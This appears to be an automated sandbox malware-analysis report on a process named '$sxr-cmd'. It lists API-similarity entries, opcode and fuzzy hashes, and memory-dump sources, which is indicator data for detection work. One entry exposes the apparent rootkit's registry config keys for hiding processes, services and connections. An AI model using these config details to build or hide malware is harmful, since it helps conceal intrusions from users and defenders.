                                                                                                            • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                            • Instruction Fuzzy Hash: 5651C831B08F8286F7A0AB25E45077AF6E5FB897A0F804235CA4D67790DF3ED4598720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsnicmpwcsrchr
                                                                                                            • String ID: COPYCMD
                                                                                                            • API String ID: 2429825313-3727491224
                                                                                                            • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                                            • Instruction ID: cc76d6807757fc36883dfedda2ce282aca646a772f41537e185ea38bb0d0a584
                                                                                                            • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                                            • Instruction Fuzzy Hash: 0EF1A372F08E5285FBA0AF51E0811BDA2E1AB087A8F804235DE5E376D4DE3DA55DC770
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$FullNamePathwcsrchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 4289998964-0
                                                                                                            • Opcode ID: 0da998e9ab16b394846e0640a477e7292e6a00879b390fc8d65d6ee2f03c3281
                                                                                                            • Instruction ID: db4d0c9d0aaceb99c54470463fc7f9be4baa9bbf4c8dc53acaf56bb1d7b6155b
                                                                                                            • Opcode Fuzzy Hash: 0da998e9ab16b394846e0640a477e7292e6a00879b390fc8d65d6ee2f03c3281
                                                                                                            • Instruction Fuzzy Hash: 5EC1A311A09B5682EBE4BB51D58837DA3A4FB45BA0F805530CE1E2B7D0EF7DA46D8730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3140674995-0
                                                                                                            • Opcode ID: 86c6cc936ed28f5d2962041aedd63c90dfcb8f061e08dbf1cd00c8f518c42c6a
                                                                                                            • Instruction ID: c05f92415962fe4e72d96c68d59b5f479fdd07acf599f853687e507ea232bd2f
                                                                                                            • Opcode Fuzzy Hash: 86c6cc936ed28f5d2962041aedd63c90dfcb8f061e08dbf1cd00c8f518c42c6a
                                                                                                            • Instruction Fuzzy Hash: 37317A72206E94EAEB608F60E854BDD7361F394758F84402AEB4E47B98EF38C54CC700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 3476366620-0
                                                                                                            • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                            • Instruction ID: f117964ae6c7b9380c627b31bf042e426f522d90616056c811a57a223f54d7e1
                                                                                                            • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                            • Instruction Fuzzy Hash: 0921ED20909E4296EB957F24A4152B8EA90FF4A735FC44235D96E662E1DF7EE42CC230
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1239891234-0
                                                                                                            • Opcode ID: 2df9c3f406e14fd3d0afe694dc4f4ee33357f5db5aa88c620fdb935c0216887e
                                                                                                            • Instruction ID: 2353789dd544381b76e58f8fb5354973fd08d846d040f623b0241962c4fe947c
                                                                                                            • Opcode Fuzzy Hash: 2df9c3f406e14fd3d0afe694dc4f4ee33357f5db5aa88c620fdb935c0216887e
                                                                                                            • Instruction Fuzzy Hash: 4C316D32215F94E6EB608F25E844BDE73A1F799768F904116FA9E43B98DF38C549CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                                                            • String ID: %9d
                                                                                                            • API String ID: 1006866328-2241623522
                                                                                                            • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                            • Instruction ID: aa2948adbfeb40610e9cb5db52b2e60cee2f58d593e3074706fadbffe14e1812
                                                                                                            • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                            • Instruction Fuzzy Hash: 1C516E71A08A42CAE780AB2198405A8BBA4FB48774F814635DA6E77791CF3DE55CCB30
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                            • String ID:
                                                                                                            • API String ID: 1443284424-0
                                                                                                            • Opcode ID: 842ab73a7096774a6d188e7949bc9c8e52c1e7c3cc90b953deb272e28a8da832
                                                                                                            • Instruction ID: 23f871aea82567dfb7ca13ade0720894b883ca50303bfec973800a3930b10350
                                                                                                            • Opcode Fuzzy Hash: 842ab73a7096774a6d188e7949bc9c8e52c1e7c3cc90b953deb272e28a8da832
                                                                                                            • Instruction Fuzzy Hash: 33E11272705AA0EAFB00CF64D0986DD7BB2F39578CF944156EE4A57B98DB38C51ACB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset
                                                                                                            • String ID:
                                                                                                            • API String ID: 2221118986-0
                                                                                                            • Opcode ID: 873b3c2c44ed97895201fd97bd1a747eda1d053ac7f6b8982f2d6aae6b07be06
                                                                                                            • Instruction ID: c24720d01e7ccf001ebe1b7b98908ecb566fd520f4cb0e24b313a0522e1c3b57
                                                                                                            • Opcode Fuzzy Hash: 873b3c2c44ed97895201fd97bd1a747eda1d053ac7f6b8982f2d6aae6b07be06
                                                                                                            • Instruction Fuzzy Hash: 67C1F822A09F82C6EBA0EB10E4D0AB9A7A4FF59764F844231DA1D67790DF3CD55CC320
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1357844191-0
                                                                                                            • Opcode ID: a78558bd1f81ee6e1dd7d50edf65511c41a2aa4325df58da4db0eec9b763d0d8
                                                                                                            • Instruction ID: 1fe46a452bf949f0126b665b613a89618f3171e7fabf0ceee0930fa71a10a1e6
                                                                                                            • Opcode Fuzzy Hash: a78558bd1f81ee6e1dd7d50edf65511c41a2aa4325df58da4db0eec9b763d0d8
                                                                                                            • Instruction Fuzzy Hash: 53A1D422A18E5285EB90FB25A481679E6E4FF8DBA0F904135DD5E73790DE3DE41DC320
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$DiskFreeSpace
                                                                                                            • String ID: %5lu
                                                                                                            • API String ID: 2448137811-2100233843
                                                                                                            • Opcode ID: 215e5527bcdf282b1a54cfe133cc73c2e3407b30518972e92e8a7a659d22b1ff
                                                                                                            • Instruction ID: 8dfa88578c8f1087f45efd3ad742e541fd2f2c890e7c5870370f715ec2d258e3
                                                                                                            • Opcode Fuzzy Hash: 215e5527bcdf282b1a54cfe133cc73c2e3407b30518972e92e8a7a659d22b1ff
                                                                                                            • Instruction Fuzzy Hash: 2C419122708AC195EBA1EF51E8416EAB7A1FB88794F848131EE4D1BB48DF7DD14DC710
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsicmp
                                                                                                            • String ID: GeToken: (%x) '%s'
                                                                                                            • API String ID: 2081463915-1994581435
                                                                                                            • Opcode ID: db21d3f5d7875ee4092bce65a18f63d4c03a4190767033ce4b9798d546bcb390
                                                                                                            • Instruction ID: e0945f51c812de7221d01274eb9a9d5718088b23d88de5c00ac84a20a1b01bfe
                                                                                                            • Opcode Fuzzy Hash: db21d3f5d7875ee4092bce65a18f63d4c03a4190767033ce4b9798d546bcb390
                                                                                                            • Instruction Fuzzy Hash: FC719D20E08E4285FBE4BB69A484275A6A0AF18774FD40A35D51E73AA0DF7DE49DC330
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3355953691.000002155A580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002155A580000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a580000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                            • String ID: *?$HIJKLMNOPQRSTUVWXYZ
                                                                                                            • API String ID: 3215553584-1407779936
                                                                                                            • Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                                                                            • Instruction ID: ab99c7aa79d091f7bb2c9d29c1e7f1bb1a26066337a0ec5e19152db8652b8d28
                                                                                                            • Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                                                                            • Instruction Fuzzy Hash: A551E373711F66E5EF14DFA29804ADD27A6F7A8BD8FA54521FE0907B85DB38C04A8300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: OpenToken$CloseProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2991381754-0
                                                                                                            • Opcode ID: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                                                            • Instruction ID: baf421741887cb602ab520eceffc477206fb03db39fda087e98276936b2352fd
                                                                                                            • Opcode Fuzzy Hash: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                                                            • Instruction Fuzzy Hash: 5A21A232B08A529BE780AB50D48027DFBA4FB897B0F904135DB5963694DF7DD84CCB20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InformationQueryToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 4239771691-0
                                                                                                            • Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                                            • Instruction ID: 9473a494d003abaff5f5589c39545ba2781c531a5851b3be8745c0f42e19038e
                                                                                                            • Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                                            • Instruction Fuzzy Hash: 6B11A573608B91DBEB519F01E4803A9FBA4FB887A5F444131DB48127A4DB7DD58CCB20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileInformation$HandleQueryVolume
                                                                                                            • String ID:
                                                                                                            • API String ID: 2149833895-0
                                                                                                            • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                            • Instruction ID: 90b43e30f45f67cfb0ccae18a785e7f4e8f65a99242cfa91585715d1a2d6b2af
                                                                                                            • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                            • Instruction Fuzzy Hash: 53118631608BC1DAE7A0AB50F4403AEFBA4FB88B54F845235DA9D52A54DFBCD44CCB20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InformationQueryToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 4239771691-0
                                                                                                            • Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                                            • Instruction ID: 2a760b4f0b5d065fa4a35c2843fac78cf2c3ccca4ffc10a9fe846e25a46d5cb9
                                                                                                            • Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                                            • Instruction Fuzzy Hash: A5F030B3704B91CBD7009F64E58449CBB78F748B94795853ACB2803704DB75D9A8CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                            • String ID: SOFTWARE\$sxrconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                            • API String ID: 106492572-3028563969
                                                                                                            • Opcode ID: f9b6faae0a979f39743cc682957071b74d06d81fd61630455472d213707cb3d2
                                                                                                            • Instruction ID: ba5bd99f7436954d1d6ff976976e3d490d8374ee78defa82bd1923e24d38955d
                                                                                                            • Opcode Fuzzy Hash: f9b6faae0a979f39743cc682957071b74d06d81fd61630455472d213707cb3d2
                                                                                                            • Instruction Fuzzy Hash: 29713C36311E28E6EF509F22E858AD967B6F7E5B9DF801151FA4E53628EF38C548C300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF7137EF52A,00000000,00000000,?,00000000,?,00007FF7137EE626,?,?,00000000,00007FF7137F1F69), ref: 00007FF7137EF8DE
